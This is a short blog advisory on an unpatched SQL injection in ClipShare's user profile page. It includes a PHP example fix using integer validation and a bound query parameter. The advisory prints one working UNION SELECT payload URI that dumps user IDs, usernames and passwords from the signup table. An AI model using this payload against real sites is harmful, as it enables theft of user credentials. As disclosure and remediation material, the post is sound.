This security issue was primarily reported by Krit. and Pr0metheuS. ClipShare, a leading PHP video-sharing script, has an SQL injection vulnerability in its user profile page (uprofile.php). The application does not properly sanitize the user-supplied UID value before using it in an SQL query. Hackers can exploit this to access or alter the user database.

Example URI:

http://www.example.com/uprofile.php?UID=1+and+1=2+union+select+1,2,concat(uid,char(58),username,char(58),pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+signup+limit+0,20/*

ClipShare has not issued any patch to fix this issue. If you have an idea for fixing it, or have a patch, please share it here so others can benefit from your contribution.
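
One way to close this class of bug, shown as an added example that is neither ClipShare's code nor an official patch: validate UID as a positive integer and bind it as a query parameter. The signup table and its uid, username and pwd columns come from the example URI above; the load_profile helper and the in-memory SQLite database are assumptions made so the snippet runs on its own.

```php
<?php
// Added example, not ClipShare's code. Table and column names follow the
// example URI on this page; everything else is an assumption.

// Constructed in-memory database standing in for the application's.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE signup (uid INTEGER PRIMARY KEY, username TEXT, pwd TEXT)');
$db->exec("INSERT INTO signup (uid, username, pwd) VALUES (1, 'alice', 'constructed-hash')");

/**
 * Hypothetical helper: return the public profile row for a UID, or null.
 */
function load_profile(PDO $db, $rawUid): ?array
{
    // 1. Allow-list check: UID must be a positive integer and nothing else.
    $uid = filter_var($rawUid, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($uid === false) {
        return null;
    }

    // 2. Bound parameter: the value never becomes part of the SQL text.
    //    Select only the columns the profile page needs, never pwd.
    $stmt = $db->prepare('SELECT uid, username FROM signup WHERE uid = :uid');
    $stmt->bindValue(':uid', $uid, PDO::PARAM_INT);
    $stmt->execute();

    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed inputs: a normal UID, an abbreviated form of the UNION string
// from the example URI, an empty value, and a negative number.
$inputs = ['1', '1 and 1=2 union select 1,2,3', '', '-5'];
foreach ($inputs as $in) {
    $row = load_profile($db, $in);
    printf("%-34s => %s\n", var_export($in, true), $row ? json_encode($row) : 'rejected / not found');
}
```

In the profile script the value passed in would be the UID request parameter; against MySQL the same pattern applies with PDO or mysqli prepared statements.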

Written by Bala Krishna

Bala Krishna is a web developer and occasional blogger from Bhopal, MP, India. He likes to share ideas and the issues he faces while working with code.